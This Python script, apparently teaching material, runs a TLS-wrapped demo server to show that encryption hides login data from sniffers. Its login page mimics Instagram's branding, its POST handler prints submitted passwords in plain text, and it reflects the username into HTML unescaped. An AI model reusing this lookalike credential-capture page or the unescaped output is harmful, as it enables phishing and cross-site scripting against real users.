#!/usr/bin/env python3
"""
secure_server.py — Module A: HTTPS Server with TLS (Secure Mitigation)
=======================================================================
SECURITY CONCEPT: Confidentiality via TLS/SSL
This server wraps the same login form in TLS using a self-signed certificate
generated by OpenSSL. Credentials are now encrypted end-to-end, making them
unreadable to any passive network observer (tshark/pyshark will show only
the TLS Handshake, not the plaintext payload).

This directly implements the CIA Triad principle of CONFIDENTIALITY via
Cryptographic Transport-Layer Security (TLS 1.2/1.3).

Pre-requisite: Run generate_certs.sh first to create server.crt and server.key
Test Case: TC-02
"""

import http.server
import ssl
import socketserver
import urllib.parse
import os
import sys

# ----- Configuration -------------------------------------------------------
PORT = 8443            # Standard HTTPS alternate port
HOST = "0.0.0.0"
CERT_FILE = os.path.join(os.path.dirname(__file__), "server.crt")
KEY_FILE  = os.path.join(os.path.dirname(__file__), "server.key")

# The same HTML login form — identical UI, but now encrypted in transit
LOGIN_PAGE_HTML = """<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram - Login Demo</title>
    <link href="https://fonts.googleapis.com/css2?family=Grand+Hotel&family=Outfit:wght@300;400;500;600&display=swap" rel="stylesheet">
    <style>
        * {{
            box-sizing: border-box;
            margin: 0;
            padding: 0;
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
        }}
        body {{
            background-color: #f0f9ff;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            padding: 20px;
        }}
        .main-card {{
            background: #ffffff;
            border: 1px solid #dbdbdb;
            border-radius: 1px;
            width: 100%;
            max-width: 935px;
            min-height: 580px;
            display: flex;
            flex-direction: column;
            justify-content: space-between;
            align-items: center;
            padding: 40px 20px 28px 20px;
            box-shadow: 0 4px 12px rgba(0,0,0,0.02);
        }}
        .login-container {{
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            flex-grow: 1;
            width: 100%;
        }}
        .login-box {{
            background-color: #ffffff;
            border: 1px solid #dbdbdb;
            border-radius: 1px;
            width: 100%;
            max-width: 350px;
            padding: 30px 40px 25px 40px;
            display: flex;
            flex-direction: column;
            text-align: center;
        }}
        .logo-container {{
            margin: 10px auto 20px auto;
        }}
        .logo-text {{
            font-family: 'Grand Hotel', cursive;
            font-size: 52px;
            color: #262626;
            user-select: none;
        }}
        .form-container {{
            display: flex;
            flex-direction: column;
        }}
        .input-group {{
            position: relative;
            margin-bottom: 6px;
            display: flex;
            align-items: center;
        }}
        .input-group input {{
            width: 100%;
            padding: 11px 8px 9px 8px;
            background: #fafafa;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
            font-size: 12px;
            color: #262626;
            outline: none;
        }}
        .input-group input:focus {{
            border-color: #a8a8a8;
        }}
        .input-group .toggle-pass {{
            position: absolute;
            right: 8px;
            font-size: 14px;
            font-weight: 600;
            color: #262626;
            cursor: pointer;
            user-select: none;
            background: none;
            border: none;
            outline: none;
        }}
        .login-btn {{
            background-color: #0095f6;
            border: 1px solid transparent;
            border-radius: 8px;
            color: #ffffff;
            font-weight: 600;
            font-size: 14px;
            padding: 7px 16px;
            cursor: pointer;
            margin-top: 8px;
            text-align: center;
            user-select: none;
            transition: background-color 0.1s ease;
        }}
        .login-btn:hover {{
            background-color: #1877f2;
        }}
        .divider-container {{
            display: flex;
            align-items: center;
            margin: 20px 0 20px 0;
        }}
        .divider-line {{
            flex-grow: 1;
            height: 1px;
            background-color: #dbdbdb;
        }}
        .divider-text {{
            color: #8e8e8e;
            font-size: 12px;
            font-weight: 600;
            margin: 0 18px;
            text-transform: uppercase;
        }}
        .fb-login-btn {{
            background: none;
            border: none;
            color: #385185;
            font-size: 14px;
            font-weight: 600;
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 8px;
            cursor: pointer;
            margin: 8px 0;
            text-decoration: none;
        }}
        .fb-icon {{
            background-color: #385185;
            color: white;
            border-radius: 4px;
            width: 16px;
            height: 16px;
            display: flex;
            align-items: center;
            justify-content: center;
            font-size: 11px;
            font-weight: bold;
        }}
        .forgot-pass {{
            color: #00376b;
            font-size: 12px;
            text-align: center;
            text-decoration: none;
            margin-top: 12px;
        }}
        .footer-container {{
            width: 100%;
            display: flex;
            flex-direction: column;
            align-items: center;
            margin-top: 30px;
        }}
        .footer-links {{
            display: flex;
            flex-wrap: wrap;
            justify-content: center;
            gap: 16px;
            width: 100%;
        }}
        .footer-links a {{
            color: #8e8e8e;
            font-size: 12px;
            text-decoration: none;
        }}
        .footer-links a:hover {{
            text-decoration: underline;
        }}
        .server-indicator {{
            margin-top: 24px;
            text-align: center;
        }}
        .indicator-badge {{
            display: inline-block;
            padding: 6px 14px;
            border-radius: 4px;
            font-size: 11px;
            font-weight: 700;
            text-transform: uppercase;
            letter-spacing: 0.5px;
            background-color: #e8f5e9;
            color: #2e7d32;
            border: 1px solid #c8e6c9;
        }}
        .message-box {{
            margin-top: 15px;
            font-size: 13px;
        }}
    </style>
</head>
<body>
  <div class="main-card">
    <div class="login-container">
      <div class="login-box">
        <div class="logo-container">
          <div class="logo-text">Instagram</div>
        </div>
        
        <form class="form-container" method="POST" action="/login">
          <div class="input-group">
            <input type="text" name="username" placeholder="Phone number, username, or email" required>
          </div>
          <div class="input-group">
            <input type="password" name="password" id="password-field" placeholder="Password" required>
            <button type="button" class="toggle-pass" onclick="togglePassword()">Show</button>
          </div>
          <button type="submit" class="login-btn">Log in</button>
        </form>
        
        <div class="divider-container">
          <div class="divider-line"></div>
          <div class="divider-text">or</div>
          <div class="divider-line"></div>
        </div>
        
        <a href="#" class="fb-login-btn">
          <span class="fb-icon">f</span> Log in with Facebook
        </a>
        
        <a href="#" class="forgot-pass">Forgot password?</a>
        
        <div class="message-box">
          {message}
        </div>
      </div>
    </div>
    
    <div class="footer-container">
      <div class="footer-links">
        <a href="#">Meta</a>
        <a href="#">About</a>
        <a href="#">Blog</a>
        <a href="#">Jobs</a>
        <a href="#">Help</a>
        <a href="#">API</a>
        <a href="#">Privacy</a>
        <a href="#">Cookie Settings</a>
        <a href="#">Terms</a>
        <a href="#">Locations</a>
        <a href="#">Instagram Lite</a>
        <a href="#">Threads</a>
        <a href="#">Contact Uploading & Non-Users</a>
        <a href="#">Meta Verified</a>
      </div>
      <div class="server-indicator">
        <span class="indicator-badge">HTTPS (TLS ENCRYPTED DEMO)</span>
      </div>
    </div>
  </div>

  <script>
    function togglePassword() {{
      var x = document.getElementById("password-field");
      var btn = document.querySelector(".toggle-pass");
      if (x.type === "password") {{
        x.type = "text";
        btn.textContent = "Hide";
      }} else {{
        x.type = "password";
        btn.textContent = "Show";
      }}
    }}
  </script>
</body>
</html>"""


class SecureLoginHandler(http.server.BaseHTTPRequestHandler):
    """
    Identical handler logic to InsecureLoginHandler, but the underlying
    socket is wrapped in an SSLContext — so all bytes on the wire are
    encrypted. tshark will only see TLS record headers, not the POST body.
    """

    def log_message(self, format, *args):
        print(f"  [HTTPS SERVER] {self.address_string()} → {format % args}")

    def do_GET(self):
        if self.path in ("/", "/login"):
            self._serve_login_page("")
        else:
            self.send_error(404, "Not Found")

    def do_POST(self):
        """
        POST body is the same application/x-www-form-urlencoded data,
        but now it travels inside an encrypted TLS record — invisible to sniffers.
        """
        if self.path == "/login":
            content_length = int(self.headers.get("Content-Length", 0))
            post_body = self.rfile.read(content_length).decode("utf-8")

            params = urllib.parse.parse_qs(post_body)
            username = params.get("username", [""])[0]
            password = params.get("password", [""])[0]

            print("\n" + "=" * 60)
            print("  [✔] ENCRYPTED CREDENTIALS DECRYPTED AT SERVER SIDE")
            print(f"       Username : {username}")
            print(f"       Password : {password}")
            print("  [✔] A wire-sniffer sees ONLY the TLS handshake — NOT this!")
            print("=" * 60 + "\n")

            msg = f'<p style="color:green;text-align:center;">Received securely: <b>{username}</b></p>'
            self._serve_login_page(msg)
        else:
            self.send_error(404)

    def _serve_login_page(self, message: str):
        html = LOGIN_PAGE_HTML.format(message=message)
        body = html.encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def build_ssl_context() -> ssl.SSLContext:
    """
    Build an SSLContext using the self-signed cert and key generated by
    generate_certs.sh.  ssl.PROTOCOL_TLS_SERVER auto-negotiates the best
    TLS version supported by both client and server (TLS 1.2 / 1.3).

    SECURITY CONCEPT: This implements:
      • Confidentiality  — encrypted payload
      • Integrity        — TLS MAC/AEAD prevents tampering
      • Identity         — server certificate authenticates server to client
    """
    if not os.path.exists(CERT_FILE) or not os.path.exists(KEY_FILE):
        print(f"\n  [ERROR] Certificate files not found!")
        print(f"          Expected: {CERT_FILE}")
        print(f"          Expected: {KEY_FILE}")
        print("          Run:  bash generate_certs.sh   (in module_a_traffic/)")
        sys.exit(1)

    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
    return ctx


def main():
    print("=" * 60)
    print("  MODULE A — SECURE HTTPS SERVER (TC-02 Mitigation)")
    print("=" * 60)
    print(f"  Listening on https://{HOST}:{PORT}")
    print("  🔒 TLS enabled — credentials are ENCRYPTED in transit")
    print("  Run sniffer_agent.py in another terminal (observe TLS handshake only).")
    print("  Browser: accept the self-signed cert warning, then proceed.")
    print("  Press Ctrl+C to stop.\n")

    try:
        ssl_ctx = build_ssl_context()
        socketserver.TCPServer.allow_reuse_address = True
        with socketserver.TCPServer((HOST, PORT), SecureLoginHandler) as httpd:
            # Wrap the raw socket with the SSL context — this is where
            # TLS kicks in: every byte sent/received is now encrypted.
            httpd.socket = ssl_ctx.wrap_socket(httpd.socket, server_side=True)
            httpd.serve_forever()
    except PermissionError:
        print(f"  [ERROR] Permission denied on port {PORT}.")
        sys.exit(1)
    except KeyboardInterrupt:
        print("\n  [INFO] Secure server stopped by user.")


if __name__ == "__main__":
    main()
